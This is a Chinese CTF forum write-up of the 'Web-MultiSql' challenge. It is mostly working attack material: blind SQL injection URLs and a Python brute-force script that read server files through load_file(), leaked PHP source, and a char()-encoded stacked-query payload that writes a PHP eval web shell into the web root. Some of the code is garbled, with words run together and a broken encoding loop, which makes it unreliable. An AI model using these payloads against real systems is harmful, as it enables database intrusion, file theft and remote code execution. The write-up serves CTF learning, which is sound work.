CTF论坛

标题: Web-MultiSql [打印本页]
作者: liqijun    时间: 2020-10-7 18:07
标题: Web-MultiSql
http://62.234.99.204:1005/
页面存在注入点
http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(user(),1,1))>120,1,0)
http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F757365722F757365722E706870),1,1))=120,1,0)
Load_file()读文件/var/www/html/user/user.php(路径16进制转码)
import requests
importmultiprocessing
import time
def runn(a,b):
  r= requests.session()
  headers ={'cookie':'PHPSESSID=r5i6l86as0l78pn3qttjp9b8v3'}
  out=''
  for i in range(a,b):
    for j in range(32,128):
     #/var/www/html//bwvs_config/sys_config.php
      #url = 'http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F2F627776735F636F6E6669672F7379735F636F6E6669672E706870),%d,1))=%d,0,1)'%(i,j)

      url = 'http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(load_file(0x2F7661722F7777772F68746D6C2F757365722F757365722E706870),%d,1))=%d,0,1)'%(i,j)  #/var/www/html/user/user.php
      #url = 'http://62.234.99.204:1005/user/user.php?id=1^if(ascii(mid(user(),%d,1))=%d,0,1)'%(i,j)
      respond = r.get(url,headers =headers).text
      if 'admin' in respond:
        out+=chr(j)
        #print(url)
        print(out)

if __name__ =='__main__':

    runn(0,10)

/var/www/html/user/user.php内容如下:
<?
phpinclude_once('../bwvs_config/sys_config.php');
  if (isset($_SESSION['user_name']))
  {
    include_once('../header.php');
    if (!isset($SESSION['user_id']))
    {
      $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_name="."'{$_SESSION['user_name']}'";
      $data = mysqli_query($connect,$sql) ordie('Mysql Error!!');
      $result = mysqli_fetch_array($data);
      $_SESSION['user_id'] =$result['DWVS_user_id'];}
      $html_avatar =htmlspecialchars($_SESSION['user_favicon']);
      if(isset($_GET['id']))
      {
        $id=waf($_GET['id']);
        $sql = "SELECT * FROMdwvs_user_message WHERE DWVS_user_id =".$id;
        $data = mysqli_multi_query($connect,$sql) or die();
        $result =mysqli_store_result($connect);
        $row = mysqli_fetch_row($result);
        echo'<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>".$row[4]."</h3>";
        mysqli_free_result($result);die();
      }
     mysqli_close($connect);
mysqli_multi_query()函数执行多条sql语句
使用char()绕过
strs='''select"<?php eval($_POST['a']);echo 'aaaaaaa'; ?>" into outfile'/var/www/html/favicon/TZDX.php';'''
print(strs)
len_str=len(strs)
for i inrange(0,len_str):
ifi == 0:
print('char(%s'%ord(strs),end="")
else:
print(',%s'%ord(strs),end="")
print(')')
注意POST['a']  a要用引号,不然连不上。

payload
set@sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);preparequery from @sql;execute query;
完整的URL=http://62.234.99.204:1005/user/user.php?id=790;set@sql=char(115,101,108,101,99,116,32,34,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,39,97,39,93,41,59,101,99,104,111,32,39,97,97,97,97,97,97,97,39,59,32,63,62,34,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,84,90,68,88,46,112,104,112,39,59);preparequery from @sql;execute query;





欢迎光临 CTF论坛 (https://www.bugku.com/) Powered by Discuz! X3.4